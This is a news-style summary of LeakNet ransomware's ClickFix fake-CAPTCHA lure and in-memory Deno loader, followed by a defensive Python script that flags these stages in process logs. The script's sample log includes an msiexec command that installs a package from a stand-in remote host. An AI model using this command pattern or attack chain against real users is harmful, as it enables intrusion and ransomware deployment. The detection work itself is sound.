
The LeakNet ransomware group has adopted a new attack method using ClickFix, a social engineering technique delivered through compromised websites. Instead of relying on stolen credentials, attackers trick users into running malicious commands themselves (for example an msiexec.exe invocation) via fake CAPTCHA prompts, so the action looks routine and harmless to the victim.
Once initial access is gained, the attack deploys a loader built on the Deno JavaScript runtime, which executes payloads directly in memory. This approach leaves few disk artifacts, making detection much harder. The malware then fingerprints the system, retrieves additional payloads from external servers, and runs in a loop, executing the commands it receives.
By moving away from initial access brokers, LeakNet can operate faster and at a larger scale. The use of legitimate but compromised websites also reduces obvious network indicators, helping the attack blend into normal traffic.
After compromise, LeakNet follows a consistent playbook: loading malicious DLLs, performing lateral movement using tools like PsExec, exfiltrating data, and encrypting systems. Stolen data is often staged in cloud storage such as S3 to disguise activity as legitimate traffic.
Conclusion: the combination of ClickFix social engineering and in-memory execution via Deno makes LeakNet attacks highly stealthy. Organizations should strengthen user awareness, restrict manual command execution, and improve endpoint and network monitoring to reduce the risk.
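The endpoint-monitoring recommendation above can be made concrete. The following script is an added example, not code from the article or from any vendor it cites: it scans a constructed process-creation log (format `host|parent_image|image|command_line`, invented here) for the two stages the summary describes, msiexec.exe pointed at a remote package (msiexec can install from an http/https path, and a pasted ClickFix command would look like that) and a Deno runtime process started by an interactive shell or by msiexec. The assumptions are that the runtime binary keeps its stock name `deno.exe` (a renamed copy would need hash- or signer-based matching instead) and that the parent list below is a reasonable baseline for an ordinary workstation; tune both for your estate.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Parents from which a Deno runtime launch is unexpected on an ordinary
# workstation (assumption: interactive shells plus the msiexec stage that
# the summary describes as the initial foothold).
SUSPICIOUS_DENO_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "msiexec.exe"}
URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)


@dataclass
class ProcEvent:
    host: str
    parent: str   # full path of the parent image
    image: str    # full path of the created process image
    cmdline: str  # command line of the created process


def parse_line(line: str) -> ProcEvent:
    """Parse one record of the constructed 'host|parent|image|cmdline' format."""
    host, parent, image, cmdline = line.rstrip("\n").split("|", 3)
    return ProcEvent(host, parent, image, cmdline)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a finding label for the event, or None if it looks benign."""
    image = basename(ev.image)
    parent = basename(ev.parent)
    # Stage 1: msiexec pointed at a remote package, consistent with a user
    # pasting a command handed to them by a fake CAPTCHA page.
    if image == "msiexec.exe" and URL_RE.search(ev.cmdline):
        return "msiexec-remote-package"
    # Stage 2: the Deno runtime started from a shell or from msiexec,
    # consistent with the in-memory loader described above.
    if image == "deno.exe" and parent in SUSPICIOUS_DENO_PARENTS:
        return "deno-from-suspicious-parent"
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Run classify() over every log line; return (host, label, cmdline) hits."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_line(line)
        label = classify(ev)
        if label:
            findings.append((ev.host, label, ev.cmdline))
    return findings


# Constructed sample log: a local MSI install and a notepad launch that
# should stay quiet, one event for each flagged pattern, and a Deno launch
# from a CI agent that the parent baseline deliberately tolerates.
SAMPLE_LOG = [
    r"ws01|C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec.exe /i C:\installers\app.msi /qn",
    r"ws01|C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|msiexec.exe /i https://captcha.example.invalid/verify.msi /qn",
    r"ws01|C:\Windows\System32\msiexec.exe|C:\Users\alice\AppData\Local\deno\deno.exe|deno.exe run -A stage2.js",
    r"build01|C:\Program Files\Jenkins\jenkins.exe|C:\tools\deno\deno.exe|deno.exe test",
    r"ws02|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe",
]

if __name__ == "__main__":
    for host, label, cmdline in scan(SAMPLE_LOG):
        print(f"{host}: {label}: {cmdline}")
```

Run against the sample, the script reports only the remote-package msiexec call and the Deno process spawned by msiexec; the local install, the CI-driven `deno test`, and notepad produce nothing. The two rules are independent on purpose: the msiexec rule catches the initial access even if the loader binary is renamed, and the Deno rule catches the loader even if a different first stage is used.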
Source: https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html
